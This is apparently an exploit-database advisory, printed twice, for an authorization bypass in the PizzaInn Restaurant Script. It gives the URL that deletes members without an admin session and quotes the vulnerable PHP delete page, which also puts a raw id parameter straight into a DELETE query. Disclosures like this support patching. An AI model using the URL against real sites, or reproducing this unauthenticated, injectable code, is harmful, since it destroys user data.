##############################################################
#Exploit Title: PizzaInn Restaurant Script Project Delete Member Authroization Bypass
#Date: 29.01.2018
#Exploit Author: 55utd55
#Author Web: 55utd55.com
#Author Social: 55utd55_tht
#Software Link: https://sourceforge.net/projects/restaurantmis/
#Tested On: Kali linux 2.0 & Windows 7
#
#Proof Of Concept:
#--------------------------
#1-) Users can be deleted without admin authority.
#2-) The ability to delete members without session control is allowed.
#3-) Users are deleted when url is visited
#http://domain/admin/delete-member.php?id=[member_id]
#
#
#
#delete-member.php
#---------------------------
#
#<?php
# //Start session
# session_start();
#
# //checking connection and connecting to a database
# require_once('connection/config.php');
# //Connect to mysql server
# $link = mysql_connect(DB_HOST, DB_USER, DB_PASSWORD);
# if(!$link) {
# die('Failed to connect to server: ' . mysql_error());
# }
#
# //Select database
# $db = mysql_select_db(DB_DATABASE);
# if(!$db) {
# die("Unable to select database");
# }
#
# // check if the 'id' variable is set in URL
# if (isset($_GET['id']))
# {
# // get id value
# $id = $_GET['id'];
#
# // delete the entry
# $result = mysql_query("DELETE FROM members WHERE member_id='$id'")
# or die("The member does not exist ... \n");
#
# // redirect back to the accounts page
# header("Loca tion: accounts.php");
# }
# else
# // if id isn't set, redirect back to the accounts page
# {
# header("loca tion: accounts.php");
# }
#
# ?>
#################################################################
#Exploit Title: PizzaInn Restaurant Script Project Delete Member Authroization Bypass
#Date: 29.01.2018
#Exploit Author: 55utd55
#Author Web: 55utd55.com
#Author Social: 55utd55_tht
#Software Link: https://sourceforge.net/projects/restaurantmis/
#Tested On: Kali linux 2.0 & Windows 7
#
#Proof Of Concept:
#--------------------------
#1-) Users can be deleted without admin authority.
#2-) The ability to delete members without session control is allowed.
#3-) Users are deleted when url is visited
#http://domain/admin/delete-member.php?id=[member_id]
#
#
#
#delete-member.php
#---------------------------
#
#<?php
# //Start session
# session_start();
#
# //checking connection and connecting to a database
# require_once('connection/config.php');
# //Connect to mysql server
# $link = mysql_connect(DB_HOST, DB_USER, DB_PASSWORD);
# if(!$link) {
# die('Failed to connect to server: ' . mysql_error());
# }
#
# //Select database
# $db = mysql_select_db(DB_DATABASE);
# if(!$db) {
# die("Unable to select database");
# }
#
# // check if the 'id' variable is set in URL
# if (isset($_GET['id']))
# {
# // get id value
# $id = $_GET['id'];
#
# // delete the entry
# $result = mysql_query("DELETE FROM members WHERE member_id='$id'")
# or die("The member does not exist ... \n");
#
# // redirect back to the accounts page
# header("Loca tion: accounts.php");
# }
# else
# // if id isn't set, redirect back to the accounts page
# {
# header("loca tion: accounts.php");
# }
#
# ?>
#################################################################